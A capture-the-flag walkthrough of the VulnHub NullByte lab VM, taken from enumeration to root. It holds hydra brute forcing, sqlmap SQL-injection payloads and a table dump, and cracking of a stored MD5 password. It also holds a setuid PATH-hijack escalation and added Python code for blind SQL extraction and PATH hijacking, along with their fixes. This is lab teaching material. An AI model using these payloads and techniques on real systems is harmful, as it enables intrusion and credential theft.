18 January 2022

Pentesting Fun Stuff

following the cyber security path…

NullByte

Location

https://download.vulnhub.com/nullbyte/NullByte.ova.zip

Description

Objective: Get to /root/proof.txt and follow the instructions.
Level: Basic to intermediate.
Description: Boot2root, box will get IP from dhcp, works fine with virtualbox&vmware.
Hints: Use your lateral thinking skills, maybe you’ll need to write some code.

Enumeration

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -p- 192.168.110.4
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-09-08 11:49 CEST
Nmap scan report for 192.168.110.4
Host is up (0.00064s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 43405/udp status
|_ 100024 1 53410/tcp status
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
| 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|_ 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
53410/tcp open status 1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.17 seconds

Let’s start with port 80.

┌─[n13mant@planetmars]─[~]
└──╼ $curl -v http://192.168.110.4/
* Trying 192.168.110.4...
* Connected to 192.168.110.4 (192.168.110.4) port 80 (#0)
> GET / HTTP/1.1
> Host: 192.168.110.4
> User-Agent: curl/7.50.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Thu, 08 Sep 2016 11:52:05 GMT
< Server: Apache/2.4.10 (Debian)
< Last-Modified: Sat, 01 Aug 2015 16:44:18 GMT
< ETag: "c4-51c42a5c32a70"
< Accept-Ranges: bytes
< Content-Length: 196
< Vary: Accept-Encoding
< Content-Type: text/html
<
<html>
<head><title>Null Byte 00 - level 1</title></head>
<body>
<center>
<img src="main.gif">
<p> If you search for the laws of harmony, you will find knowledge. </p>
</center>
</body>
</html>
* Connection #0 to host 192.168.110.4 left intact
┌─[n13mant@planetmars]─[~]
└──╼ $dirb http://192.168.110.4/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Sep 8 11:53:59 2016
URL_BASE: http://192.168.110.4/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.110.4/ ----
+ http://192.168.110.4/index.html (CODE:200|SIZE:196)
==> DIRECTORY: http://192.168.110.4/javascript/
==> DIRECTORY: http://192.168.110.4/phpmyadmin/
+ http://192.168.110.4/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.110.4/uploads/
-----SNIP-----

Next I downloaded the main.gif file and examined it with exiftool. There was a password-like piece inside as a comment: “P-): kzMb5nVYJw”. Was it a password for the phpMyAdmin site or something else? A simple try was to append it to the URL, and the result was satisfying.

┌─[n13mant@planetmars]─[~]
└──╼ $curl http://192.168.110.4/kzMb5nVYJw/
<center>
<form method="post" action="index.php">
Key:<br>
<input type="password" name="key">
</form>
</center>
<!-- this form isn't connected to mysql, password ain't that complex --!>

The password is not that complex, but after a few tries I decided to let hydra do this tiresome job. In hydra's http-form-post module the third colon-separated field (here "invalid key") is the text that marks a failed attempt, so the one response that does not contain it is reported as the valid password.

┌─[n13mant@planetmars]─[~]
└──╼ $hydra -f 192.168.110.4 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l "" -P /usr/share/wordlists/english_words/words.dic
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
-----SNIP-----
[DATA] attacking service http-post-form on port 80
[80][http-post-form] host: 192.168.110.4 password: elite
1 of 1 target successfully completed, 1 valid password found
┌─[n13mant@planetmars]─[~]
└──╼ $curl -X POST -F 'key=elite' http://192.168.110.4/kzMb5nVYJw/index.php
<p>Search for usernames: </p>
<hr>
<form action="420search.php" method="get">
Enter username:<br>
<input type="text" name="usrtosearch">
</form>
┌─[n13mant@planetmars]─[~]
└──╼ $curl -X POST -F 'key=elite' http://192.168.110.4/kzMb5nVYJw/420search.php
EMP ID :1 <br> EMP NAME : ramses <br> EMP POSITION : <br> --------------------------------<br>EMP ID :2 <br> EMP NAME : isis <br> EMP POSITION : employee <br> --------------------------------<br>Fetched data successfully

A database sits behind the search. First some manual tries, but after a while I decided to put my faith in sqlmap; the trailing `*` in the URL marks the injection point for it.

┌─[n13mant@planetmars]─[~]
└──╼ $sqlmap -u "http://192.168.110.4/kzMb5nVYJw/420search.php?usrtosearch=isis*" --dbs
sqlmap {1.0.8.2#dev} - http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 13:20:24
-----SNIP-----
Parameter: #1* (URI)
 Type: boolean-based blind
 Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
 Payload: http://192.168.110.4:80/kzMb5nVYJw/420search.php?usrtosearch=isis" AND 8757=8757#
Type: error-based
 Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
 Payload: http://192.168.110.4:80/kzMb5nVYJw/420search.php?usrtosearch=isis" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162787671,(SELECT (ELT(6320=6320,1))),0x717a767a71,0x78))s), 8446744073709551610, 8446744073709551610)))-- PfDF
Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind
 Payload: http://192.168.110.4:80/kzMb5nVYJw/420search.php?usrtosearch=isis" AND SLEEP(5)-- IEfZ
Type: UNION query
 Title: MySQL UNION query (NULL) - 3 columns
 Payload: http://192.168.110.4:80/kzMb5nVYJw/420search.php?usrtosearch=isis" UNION ALL SELECT CONCAT(0x7162787671,0x4772734e5241706d774a6f734c53427a57414870547246534a69794b454d447665754461756c7778,0x717a767a71),NULL,NULL#
---
[13:20:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.5
[13:20:51] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
┌─[n13mant@planetmars]─[~]
└──╼ $sqlmap -u "http://192.168.110.4/kzMb5nVYJw/420search.php?usrtosearch=isis*" --dbms=mysql -D seth --tables
-----SNIP-----
[13:24:00] [INFO] fetching tables for database: 'seth'
Database: seth
[1 table]
+-------+
| users |
+-------+
┌─[n13mant@planetmars]─[~]
└──╼ $sqlmap -u "http://192.168.110.4/kzMb5nVYJw/420search.php?usrtosearch=isis*" --dbms=mysql -D seth -T users --dump
-----SNIP-----
[13:24:14] [INFO] fetching columns for table 'users' in database 'seth'
[13:24:14] [INFO] fetching entries for table 'users' in database 'seth'
[13:24:14] [INFO] analyzing table dump for possible password hashes
Database: seth
Table: users
[2 entries]
+----+---------------------------------------------+--------+------------+
| id | pass | user | position |
+----+---------------------------------------------+--------+------------+
| 1 | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank> |
| 2 | --not allowed-- | isis | employee |
+----+---------------------------------------------+--------+------------+
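What sqlmap did above, reproduced as an added Python model (this is not the box's PHP, and not sqlmap's code). Assumptions: the table layout is the one dumped (seth.users with id, pass, user, position); the query shape is inferred from sqlmap's payloads (string context closed by a quote, three columns, `LIKE` because an empty search returned every row); SQLite stands in for MySQL, so the model quotes with `'` and comments with `-- ` where the real payloads used `"` and `#`. The block shows the vulnerable concatenated query beside the parameterised fix, the UNION dump, and a boolean-based blind extraction that recovers the ramses password column from nothing but "rows or no rows":

```python
import sqlite3

# Rows as dumped from seth.users (constructed seed for the in-memory stand-in).
SEED = [
    (1, "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE", "ramses", ""),
    (2, "--not allowed--", "isis", "employee"),
]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, pass TEXT, user TEXT, position TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SEED)
    return con


def search_vulnerable(con, term):
    # Assumed shape of 420search.php: the input is pasted into the SQL text,
    # so a quote in `term` ends the string and the rest is parsed as SQL.
    sql = f"SELECT id, user, position FROM users WHERE user LIKE '%{term}%'"
    return con.execute(sql).fetchall()


def search_fixed(con, term):
    # Parameterised: the term is bound as data and can never change the query.
    sql = "SELECT id, user, position FROM users WHERE user LIKE ?"
    return con.execute(sql, (f"%{term}%",)).fetchall()


def union_dump(con):
    # Same column count (3) as the original SELECT, so the pass column is
    # rendered where the page expects the user name.
    payload = "' UNION ALL SELECT id, pass, user FROM users-- "
    return search_vulnerable(con, payload)


def blind_extract(con, victim, max_len=64):
    """Boolean-based blind extraction of users.pass for `victim`.

    The only signal used is whether the page returned rows, which is exactly
    what sqlmap's 'AND boolean-based blind' technique works from.
    """

    def oracle(cond):
        return bool(search_vulnerable(con, f"isis' AND ({cond})-- "))

    length_of = f"(SELECT length(pass) FROM users WHERE user='{victim}')"
    out = []
    for pos in range(1, max_len + 1):
        if not oracle(f"{length_of} >= {pos}"):  # past the end of the value
            break
        sub = f"(SELECT unicode(substr(pass, {pos}, 1)) FROM users WHERE user='{victim}')"
        lo, hi = 0, 127
        while lo < hi:  # binary search over ASCII: 7 requests per character
            mid = (lo + hi) // 2
            if oracle(f"{sub} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "isis' AND 1=1-- "))  # row comes back
    print(search_vulnerable(db, "isis' AND 1=2-- "))  # nothing: the oracle
    print(search_fixed(db, "isis' AND 1=1-- "))       # nothing: treated as a literal
    print(union_dump(db))
    print(blind_extract(db, "ramses"))
```

The fix is the parameterised query; the surrounding application code is otherwise unchanged, which is the point: escaping by hand is what the concatenated version tried to get away without, and a prepared statement makes the question moot.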

I guess the isis user will be the goal to elevate to when inside the machine. The string from ramses looks like base64 to me. The dumped value is 43 characters, one short of a full base64 group, so the trailing `=` padding has to be put back before `base64 -d` will accept it.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo 'YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=' | base64 -d
c6d6bd7ebf806f43c76acc3681703b81

And that, 32 hex characters, looks like an MD5 hash.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $findmyhash MD5 -h c6d6bd7ebf806f43c76acc3681703b81
-----SNIP-----
The following hashes were cracked:
----------------------------------
c6d6bd7ebf806f43c76acc3681703b81 -> omega
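The decode and crack chain above, as an added Python example (not part of the original post): the padding repair is made explicit, the digest shape is checked before assuming MD5, and a constructed in-line wordlist stands in for the online services findmyhash consulted.

```python
import base64
import hashlib
import re

# Value exactly as it came out of the sqlmap dump: 43 characters, padding gone.
DUMPED = "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE"

# Constructed wordlist for the example; a real run would use a dictionary file.
WORDLIST = ["alpha", "password", "omega", "elite", "ramses"]


def b64_decode_lenient(s):
    """Decode base64 whose trailing '=' padding was stripped (column truncation,
    copy/paste, or a web app that drops it). Re-pads to a multiple of 4 first."""
    s = s.strip()
    s += "=" * (-len(s) % 4)
    return base64.b64decode(s, validate=True)


def looks_like_md5(s):
    """32 lowercase hex digits is the shape of MD5, but also of MD4/NTLM and
    others, so this is a hint for which attack to try, not an identification."""
    return re.fullmatch(r"[0-9a-f]{32}", s) is not None


def crack_md5(target, words):
    """Dictionary attack: hash each candidate and compare. None if nothing matches."""
    target = target.lower()
    for w in words:
        if hashlib.md5(w.encode()).hexdigest() == target:
            return w
    return None


def recover_password(dumped, words=WORDLIST):
    """Return (digest, plaintext-or-None) for a base64-wrapped MD5 as stored in seth.users."""
    digest = b64_decode_lenient(dumped).decode("ascii")
    if not looks_like_md5(digest):
        raise ValueError(f"decoded value is not a 32-hex digest: {digest!r}")
    return digest, crack_md5(digest, words)


if __name__ == "__main__":
    print(recover_password(DUMPED))
```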

Let’s see if this will grant some access to the server.

┌─[n13mant@planetmars]─[~]
└──╼ $ssh ramses@192.168.110.4 -p 777
ramses@192.168.110.4's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$
ramses@NullByte:~$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
ramses@NullByte:~$ sudo -l
[sudo] password for ramses:
Sorry, user ramses may not run sudo on NullByte.
ramses@NullByte:/home$ ls -lah
total 20K
drwxr-xr-x 5 root root 4.0K Aug 2 2015 .
drwxr-xr-x 21 root root 4.0K Aug 1 2015 ..
drwxr-xr-x 2 bob bob 4.0K Aug 2 2015 bob
drwxr-xr-x 2 eric eric 4.0K Aug 2 2015 eric
drwxr-xr-x 2 ramses ramses 4.0K Aug 2 2015 ramses

bob and eric? Not the kind of names I would have expected.

ramses@NullByte:/home$ ls -aRl bob
bob:
total 20
drwxr-xr-x 2 bob bob 4096 Aug 2 2015 .
drwxr-xr-x 5 root root 4096 Aug 2 2015 ..
-rw-r--r-- 1 bob bob 220 Aug 2 2015 .bash_logout
-rw-r--r-- 1 bob bob 3515 Aug 2 2015 .bashrc
-rw-r--r-- 1 bob bob 675 Aug 2 2015 .profile
ramses@NullByte:/home$ ls -aRl eric
eric:
total 24
drwxr-xr-x 2 eric eric 4096 Aug 2 2015 .
drwxr-xr-x 5 root root 4096 Aug 2 2015 ..
-rw------- 1 eric eric 545 Aug 2 2015 .bash_history
-rw-r--r-- 1 eric eric 220 Aug 2 2015 .bash_logout
-rw-r--r-- 1 eric eric 3515 Aug 2 2015 .bashrc
-rw-r--r-- 1 eric eric 675 Aug 2 2015 .profile
ramses@NullByte:/home$ ls -aRl ramses
ramses:
total 24
drwxr-xr-x 2 ramses ramses 4096 Aug 2 2015 .
drwxr-xr-x 5 root root 4096 Aug 2 2015 ..
-rw------- 1 ramses ramses 96 Aug 2 2015 .bash_history
-rw-r--r-- 1 ramses ramses 220 Aug 2 2015 .bash_logout
-rw-r--r-- 1 ramses ramses 3515 Aug 2 2015 .bashrc
-rw-r--r-- 1 ramses ramses 675 Aug 2 2015 .profile
ramses@NullByte:/home$ cat /home/ramses/.bash_history
sudo -s
su eric
exit
ls
clear
cd /var/www
cd backup/
ls
./procwatch
clear
sudo -s
cd /
ls
exit

A backup folder in /var/www.

ramses@NullByte:/home$ cd /var/www/
ramses@NullByte:/var/www$ ls -lah
total 16K
drwxr-xr-x 4 root root 4.0K Aug 2 2015 .
drwxr-xr-x 12 root root 4.0K Aug 2 2015 ..
drwxrwxrwx 2 root root 4.0K Aug 2 2015 backup
drwxr-xr-x 4 root root 4.0K Aug 2 2015 html
ramses@NullByte:/var/www$ cd backup
ramses@NullByte:/var/www/backup$ ls -lh
total 12K
-rwsr-xr-x 1 root root 4.9K Aug 2 2015 procwatch
-rw-r--r-- 1 root root 28 Aug 2 2015 readme.txt
ramses@NullByte:/var/www/backup$ ls -lah
total 20K
drwxrwxrwx 2 root root 4.0K Aug 2 2015 .
drwxr-xr-x 4 root root 4.0K Aug 2 2015 ..
-rwsr-xr-x 1 root root 4.9K Aug 2 2015 procwatch
-rw-r--r-- 1 root root 28 Aug 2 2015 readme.txt
ramses@NullByte:/var/www/backup$ cat readme.txt
I have to fix this mess...

What mess?

ramses@NullByte:/var/www/backup$ ./procwatch
 PID TTY TIME CMD
 1679 pts/0 00:00:00 procwatch
 1680 pts/0 00:00:00 sh
 1681 pts/0 00:00:00 ps

procwatch is setuid root (`-rwsr-xr-x`, owned by root), and the listing shows it spawning a `sh` that runs `ps`. The command is resolved through PATH rather than given as an absolute path, and the directory the binary lives in is world-writable, so anyone can plant their own `ps` and get it executed as root.

ramses@NullByte:/var/www/backup$ ln -snf /bin/sh ps
ramses@NullByte:/var/www/backup$ export PATH=`pwd`:${PATH}

I made a symbolic link to /bin/sh and called it ps. Then I set PATH to my current location.
Linking to /bin/sh rather than bash matters here: on Debian /bin/sh is dash, which keeps the effective uid it inherits, whereas bash resets the effective uid to the real uid unless started with `-p`.
Now it’s time to run procwatch again.

ramses@NullByte:/var/www/backup$ ./procwatch
# id
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
# cd /root
# ls
proof.txt
# cat proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d
It seems that you have pwned the box, congrats.
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com
USE THIS PGP PUBLIC KEY
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0

[key material omitted]
=PiAQ
-----END PGP PUBLIC KEY BLOCK-----
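The hijack and its fix, as an added Python model (this is not the box's procwatch binary). Assumptions: the victim is modelled as `sh -c ps`, which is what the process listing showed procwatch doing; the planted `ps` only prints a marker where the walkthrough linked /bin/sh, so the effect is visible without needing a setuid binary; the model runs unprivileged, the real hijack additionally ran with euid 0.

```python
import os
import shutil
import stat
import subprocess
import tempfile

# Constructed stand-in for the `ln -snf /bin/sh ps` step.
FAKE_PS = "#!/bin/sh\necho HIJACKED\n"
# What a hardened caller should use instead of whatever PATH it inherited.
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def plant_fake_ps(directory):
    """Drop an executable named `ps` into a directory the attacker can write to
    (on the box: the world-writable /var/www/backup)."""
    path = os.path.join(directory, "ps")
    with open(path, "w") as f:
        f.write(FAKE_PS)
    mode = os.stat(path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
    os.chmod(path, mode)
    return path


def attacker_env(directory):
    """The `export PATH=`pwd`:${PATH}` step: attacker-controlled directory first."""
    return {"PATH": directory + ":" + os.environ.get("PATH", TRUSTED_PATH)}


def resolve(command, env):
    """Which file the shell will run for a bare command name under this PATH
    (same left-to-right search execvp performs)."""
    return shutil.which(command, path=env["PATH"])


def run_like_procwatch(env):
    """procwatch's behaviour as seen in the ps listing: a shell, given a bare `ps`,
    with the caller's environment passed through untouched."""
    r = subprocess.run(["sh", "-c", "ps"], env=env, capture_output=True, text=True)
    return r.stdout


def run_hardened():
    """Fixed version: resolve `ps` from a fixed trusted PATH, execute it by absolute
    path, and give the child a minimal environment so the caller's PATH, IFS or
    LD_* variables cannot steer it."""
    ps = shutil.which("ps", path=TRUSTED_PATH)
    if ps is None:  # no real ps on this host; nothing to run
        return ""
    r = subprocess.run([ps], env={"PATH": TRUSTED_PATH}, capture_output=True, text=True)
    return r.stdout


def demo():
    """Plant the fake, run both variants, report what each resolved and printed."""
    with tempfile.TemporaryDirectory() as d:
        plant_fake_ps(d)
        env = attacker_env(d)
        return {
            "fake_dir": d,
            "resolved": resolve("ps", env),
            "hijacked": run_like_procwatch(env),
            "hardened": run_hardened(),
        }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

Besides the absolute path, the fix that actually closes the class of bug is the scrubbed environment: a setuid program that hands its inherited environment to any child is trusting the attacker to choose PATH for root.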

Conclusion

This was a cool challenge. I had fun and learned new stuff.
Thanks to ly0n for making this one available.
